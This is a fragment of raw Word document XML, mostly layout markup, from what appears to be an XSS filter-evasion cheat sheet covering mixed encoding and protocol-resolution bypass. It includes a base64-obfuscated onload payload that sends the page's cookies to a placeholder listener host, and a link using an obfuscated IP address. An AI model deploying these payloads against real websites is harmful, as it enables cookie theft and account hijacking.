        <w:t>Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b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4092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5455285" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="538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5285" cy="116205"/>
                          <a:chOff x="1614" y="240"/>
                          <a:chExt cx="8591" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="539" name="Freeform 541"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="240"/>
                            <a:ext cx="8591" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 10183 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 8591"/>
                              <a:gd name="T2" fmla="+- 0 422 240"/>
                              <a:gd name="T3" fmla="*/ 422 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 8591"/>
                              <a:gd name="T6" fmla="+- 0 422 240"/>
                              <a:gd name="T7" fmla="*/ 422 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 8591"/>
                              <a:gd name="T10" fmla="+- 0 422 240"/>
                              <a:gd name="T11" fmla="*/ 422 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 8591"/>
                              <a:gd name="T14" fmla="+- 0 401 240"/>
                              <a:gd name="T15" fmla="*/ 401 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 8591"/>
                              <a:gd name="T18" fmla="+- 0 398 240"/>
                              <a:gd name="T19" fmla="*/ 398 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 8591"/>
                              <a:gd name="T22" fmla="+- 0 261 240"/>
                              <a:gd name="T23" fmla="*/ 261 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 8591"/>
                              <a:gd name="T26" fmla="+- 0 240 240"/>
                              <a:gd name="T27" fmla="*/ 240 h 183"/>
                              <a:gd name="T28" fmla="+- 0 10183 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 8591"/>
                              <a:gd name="T30" fmla="+- 0 240 240"/>
                              <a:gd name="T31" fmla="*/ 240 h 183"/>
                              <a:gd name="T32" fmla="+- 0 10204 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 8591"/>
                              <a:gd name="T34" fmla="+- 0 261 240"/>
                              <a:gd name="T35" fmla="*/ 261 h 183"/>
                              <a:gd name="T36" fmla="+- 0 10204 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 8591"/>
                              <a:gd name="T38" fmla="+- 0 401 240"/>
                              <a:gd name="T39" fmla="*/ 401 h 183"/>
                              <a:gd name="T40" fmla="+- 0 10186 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 8591"/>
                              <a:gd name="T42" fmla="+- 0 422 240"/>
                              <a:gd name="T43" fmla="*/ 422 h 183"/>
                              <a:gd name="T44" fmla="+- 0 10183 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 8591"/>
                              <a:gd name="T46" fmla="+- 0 422 240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591" h="183">
                                <a:moveTo>
                                  <a:pt x="856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569" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8590" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8590" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8572" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="856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Text Box 540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40"/>
                            <a:ext cx="859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7"/>
                                  <w:sz w:val="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onload="eval(atob('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ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))"&gt;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9" o:spid="_x0000_s1887" style="position:absolute;margin-left:80.7pt;margin-top:12pt;width:429.55pt;height:9.15pt;z-index:-15575552;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,240" coordsize="859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">
                <v:shape id="Freeform 541" o:spid="_x0000_s1888" style="position:absolute;left:1614;top:240;width:8591;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="859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quUMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2sCMRTE74V+h/CE3mrWFkVXo0it4EWpf8DrY/Pc&#10;LG5etkmqq5++EQo9DjPzG2Yya20tLuRD5VhBr5uBIC6crrhUcNgvX4cgQkTWWDsmBTcKMJs+P00w&#10;1+7KW7rsYikShEOOCkyMTS5lKAxZDF3XECfv5LzFmKQvpfZ4TXBby7csG0iLFacFgw19GCrOux+r&#10;YP4lt9583hfrw/57QcfNplwPSKmXTjsfg4jUxv/wX3ulFfTfR/A4k46An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yq5QxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m8569,182l21,182r-3,l,161r,-3l,21,21,,8569,r21,21l8590,161r-18,21l8569,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8569,422;21,422;18,422;0,401;0,398;0,261;21,240;8569,240;8590,261;8590,401;8572,422;8569,422" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 540" o:spid="_x0000_s1889" type="#_x0000_t202" style="position:absolute;left:1614;top:240;width:859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tENs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Yw/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O0Q2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77"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> 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onload="eval(atob('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ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))"&gt;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b/>
          <w:sz w:val="9"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:spacing w:before="102"/>
        <w:ind w:left="154"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Mixed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="4"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="219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4144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420370</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5524500" cy="386080"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="535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386080"/>
                          <a:chOff x="1614" y="662"/>
                          <a:chExt cx="8700" cy="608"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="536" name="Freeform 538"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="662"/>
                            <a:ext cx="8700" cy="608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1270 662"/>
                              <a:gd name="T3" fmla="*/ 1270 h 608"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 8700"/>
                              <a:gd name="T6" fmla="+- 0 1270 662"/>
                              <a:gd name="T7" fmla="*/ 1270 h 608"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 8700"/>
                              <a:gd name="T10" fmla="+- 0 1269 662"/>
                              <a:gd name="T11" fmla="*/ 1269 h 608"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 8700"/>
                              <a:gd name="T14" fmla="+- 0 1249 662"/>
                              <a:gd name="T15" fmla="*/ 1249 h 608"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 8700"/>
                              <a:gd name="T18" fmla="+- 0 1246 662"/>
                              <a:gd name="T19" fmla="*/ 1246 h 608"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 8700"/>
                              <a:gd name="T22" fmla="+- 0 683 662"/>
                              <a:gd name="T23" fmla="*/ 683 h 608"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 8700"/>
                              <a:gd name="T26" fmla="+- 0 662 662"/>
                              <a:gd name="T27" fmla="*/ 662 h 608"/>
                              <a:gd name="T28" fmla="+- 0 10293 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 8700"/>
                              <a:gd name="T30" fmla="+- 0 662 662"/>
                              <a:gd name="T31" fmla="*/ 662 h 608"/>
                              <a:gd name="T32" fmla="+- 0 10314 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 8700"/>
                              <a:gd name="T34" fmla="+- 0 683 662"/>
                              <a:gd name="T35" fmla="*/ 683 h 608"/>
                              <a:gd name="T36" fmla="+- 0 10314 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 8700"/>
                              <a:gd name="T38" fmla="+- 0 1249 662"/>
                              <a:gd name="T39" fmla="*/ 1249 h 608"/>
                              <a:gd name="T40" fmla="+- 0 10296 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 8700"/>
                              <a:gd name="T42" fmla="+- 0 1269 662"/>
                              <a:gd name="T43" fmla="*/ 1269 h 608"/>
                              <a:gd name="T44" fmla="+- 0 10293 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 8700"/>
                              <a:gd name="T46" fmla="+- 0 1270 662"/>
                              <a:gd name="T47" fmla="*/ 1270 h 6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608">
                                <a:moveTo>
                                  <a:pt x="8679" y="608"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21" y="608"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="607"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="587"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="584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587"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8682" y="607"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8679" y="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Text Box 53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662"/>
                            <a:ext cx="8700" cy="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&lt;</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:color w:val="3F6EC6"/>
                                  <w:w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>A</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:color w:val="3F6EC6"/>
                                  <w:spacing w:val="-14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HREF=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w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>"h</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:tabs>
                                  <w:tab w:val="left" w:pos="1176"/>
                                </w:tabs>
                                <w:spacing w:before="45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1B7D4D"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>tt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spacing w:val="4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sz w:val="15"/>
                                </w:rPr>
                                <w:t>p://6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sz w:val="15"/>
                                </w:rPr>
                                <w:tab/>
                                <w:t>6.000146.0x7.147/"</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>&gt;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XSS</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>&lt;/</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:color w:val="3F6EC6"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>A</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:sz w:val="15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6" o:spid="_x0000_s1890" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:33.1pt;width:435pt;height:30.4pt;z-index:-15575040;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,662" coordsize="8700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">
                <v:shape id="Freeform 538" o:spid="_x0000_s1891" style="position:absolute;left:1614;top:662;width:8700;height:608;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8700,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xL28UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE7wX/Q3hCL6VmbelWVqOIIIgg6LYXb4/N&#10;c7Ps5iVsUt3+e1MQehxm5htmsRpsJ67Uh8axgukkA0FcOd1wreD7a/s6AxEissbOMSn4pQCr5ehp&#10;gYV2Nz7RtYy1SBAOBSowMfpCylAZshgmzhMn7+J6izHJvpa6x1uC206+ZVkuLTacFgx62hiq2vLH&#10;KhgOZrt7Oe8vpzb3rvx0x5b9Uann8bCeg4g0xP/wo73TCj7ec/g7k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EvbxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m8679,608l21,608r-3,-1l,587r,-3l,21,21,,8679,r21,21l8700,587r-18,20l8679,608xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8679,1270;21,1270;18,1269;0,1249;0,1246;0,683;21,662;8679,662;8700,683;8700,1249;8682,1269;8679,1270" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 537" o:spid="_x0000_s1892" type="#_x0000_t202" style="position:absolute;left:1614;top:662;width:8700;height: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SvP8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9SvP8YAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==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&lt;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="3F6EC6"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>A</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="3F6EC6"/>
                            <w:spacing w:val="-14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HREF=</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="1B7D4D"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>"h</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:tabs>
                            <w:tab w:val="left" w:pos="1176"/>
                          </w:tabs>
                          <w:spacing w:before="45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1B7D4D"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>tt</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="1B7D4D"/>
                            <w:spacing w:val="4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1B7D4D"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>p://6</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="1B7D4D"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:tab/>
                          <w:t>6.000146.0x7.147/"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>&gt;</w:t>
                        </w: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XSS</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>&lt;/</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="3F6EC6"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>A</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>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Let's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mix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match</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>encoding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throw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tabs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newlines</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4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why</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>browsers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>allow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>this,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>I'll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>never</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>know).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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newlines</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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encapsulated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quotes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk4"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t>Protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Resolution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2098"/>
        </w:tabs>
        <w:spacing w:before="101"/>
        <w:ind w:left="436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83776" behindDoc="0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67945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="154305" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="532" name="Group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305" cy="116205"/>
                          <a:chOff x="1614" y="107"/>
                          <a:chExt cx="243" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="533" name="Picture 5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4" y="107"/>
                            <a:ext cx="24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4" name="Text Box 534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07"/>
                            <a:ext cx="24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//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3" o:spid="_x0000_s1893" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:5.35pt;width:12.15pt;height:9.15pt;z-index:15883776;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,107" coordsize="243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">
                <v:shape id="Picture 535" o:spid="_x0000_s1894" type="#_x0000_t75" style="position:absolute;left:1614;top:107;width:243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S74DFAAAA3AAAAA8AAABkcnMvZG93bnJldi54bWxEj0GLwjAUhO/C/ofwBG+aall3qUZZhYp4&#10;Ed29eHs0z7bYvJQm1eqv3wiCx2FmvmHmy85U4kqNKy0rGI8iEMSZ1SXnCv5+0+E3COeRNVaWScGd&#10;HCwXH705Jtre+EDXo89FgLBLUEHhfZ1I6bKCDLqRrYmDd7aNQR9kk0vd4C3ATSUnUTSVBksOCwXW&#10;tC4ouxxbo+B02Ve71Sbe6XYz/UpP6epRt51Sg373MwPhqfPv8Ku91Qo+4xieZ8IRk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Uu+AxQAAANwAAAAPAAAAAAAAAAAAAAAA&#10;AJ8CAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABAD3AAAAkQMAAAAA&#10;">
                  <v:imagedata r:id="rId65" o:title=""/>
                </v:shape>
                <v:shape id="Text Box 534" o:spid="_x0000_s1895" type="#_x0000_t202" style="position:absolute;left:1614;top:107;width:243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xSM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WD4/gH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jFI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//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82016" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1812290</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>67945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="424815" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="529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815" cy="116205"/>
                          <a:chOff x="2854" y="107"/>
                          <a:chExt cx="669" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="530" name="Freeform 532"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2853" y="107"/>
                            <a:ext cx="669" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3501 2854"/>
                              <a:gd name="T1" fmla="*/ T0 w 669"/>
                              <a:gd name="T2" fmla="+- 0 289 107"/>
                              <a:gd name="T3" fmla="*/ 289 h 183"/>
                              <a:gd name="T4" fmla="+- 0 2875 2854"/>
                              <a:gd name="T5" fmla="*/ T4 w 669"/>
                              <a:gd name="T6" fmla="+- 0 289 107"/>
                              <a:gd name="T7" fmla="*/ 289 h 183"/>
                              <a:gd name="T8" fmla="+- 0 2872 2854"/>
                              <a:gd name="T9" fmla="*/ T8 w 669"/>
                              <a:gd name="T10" fmla="+- 0 289 107"/>
                              <a:gd name="T11" fmla="*/ 289 h 183"/>
                              <a:gd name="T12" fmla="+- 0 2854 2854"/>
                              <a:gd name="T13" fmla="*/ T12 w 669"/>
                              <a:gd name="T14" fmla="+- 0 268 107"/>
                              <a:gd name="T15" fmla="*/ 268 h 183"/>
                              <a:gd name="T16" fmla="+- 0 2854 2854"/>
                              <a:gd name="T17" fmla="*/ T16 w 669"/>
                              <a:gd name="T18" fmla="+- 0 265 107"/>
                              <a:gd name="T19" fmla="*/ 265 h 183"/>
                              <a:gd name="T20" fmla="+- 0 2854 2854"/>
                              <a:gd name="T21" fmla="*/ T20 w 669"/>
                              <a:gd name="T22" fmla="+- 0 128 107"/>
                              <a:gd name="T23" fmla="*/ 128 h 183"/>
                              <a:gd name="T24" fmla="+- 0 2875 2854"/>
                              <a:gd name="T25" fmla="*/ T24 w 669"/>
                              <a:gd name="T26" fmla="+- 0 107 107"/>
                              <a:gd name="T27" fmla="*/ 107 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3501 2854"/>
                              <a:gd name="T29" fmla="*/ T28 w 669"/>
                              <a:gd name="T30" fmla="+- 0 107 107"/>
                              <a:gd name="T31" fmla="*/ 107 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3522 2854"/>
                              <a:gd name="T33" fmla="*/ T32 w 669"/>
                              <a:gd name="T34" fmla="+- 0 128 107"/>
                              <a:gd name="T35" fmla="*/ 128 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3522 2854"/>
                              <a:gd name="T37" fmla="*/ T36 w 669"/>
                              <a:gd name="T38" fmla="+- 0 268 107"/>
                              <a:gd name="T39" fmla="*/ 268 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3504 2854"/>
                              <a:gd name="T41" fmla="*/ T40 w 669"/>
                              <a:gd name="T42" fmla="+- 0 289 107"/>
                              <a:gd name="T43" fmla="*/ 289 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3501 2854"/>
                              <a:gd name="T45" fmla="*/ T44 w 669"/>
                              <a:gd name="T46" fmla="+- 0 289 107"/>
                              <a:gd name="T47" fmla="*/ 2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69" h="183">
                                <a:moveTo>
                                  <a:pt x="647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47" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="668" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="668" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="650" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="64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Text Box 531"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2853" y="107"/>
                            <a:ext cx="66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7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http://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0" o:spid="_x0000_s1896" style="position:absolute;left:0;text-align:left;margin-left:142.7pt;margin-top:5.35pt;width:33.45pt;height:9.15pt;z-index:-17534464;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="2854,107" coordsize="66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">
                <v:shape id="Freeform 532" o:spid="_x0000_s1897" style="position:absolute;left:2853;top:107;width:669;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="66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03xMMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPy2rCQBTdF/yH4Qru6qSVFomOUsRi6UJqfODymrkm&#10;wcydMDOa9O+dheDycN7TeWdqcSPnK8sK3oYJCOLc6ooLBbvt9+sYhA/IGmvLpOCfPMxnvZcpptq2&#10;vKFbFgoRQ9inqKAMoUml9HlJBv3QNsSRO1tnMEToCqkdtjHc1PI9ST6lwYpjQ4kNLUrKL9nVKDj9&#10;rleLS+aX13azd8vjX34YubFSg373NQERqAtP8cP9oxV8jOL8eCYeAT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03xMMAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m647,182r-626,l18,182,,161r,-3l,21,21,,647,r21,21l668,161r-18,21l647,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="647,289;21,289;18,289;0,268;0,265;0,128;21,107;647,107;668,128;668,268;650,289;647,289" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 531" o:spid="_x0000_s1898" type="#_x0000_t202" style="position:absolute;left:2853;top:107;width:66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GS0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3GS0M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7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http://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translates</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
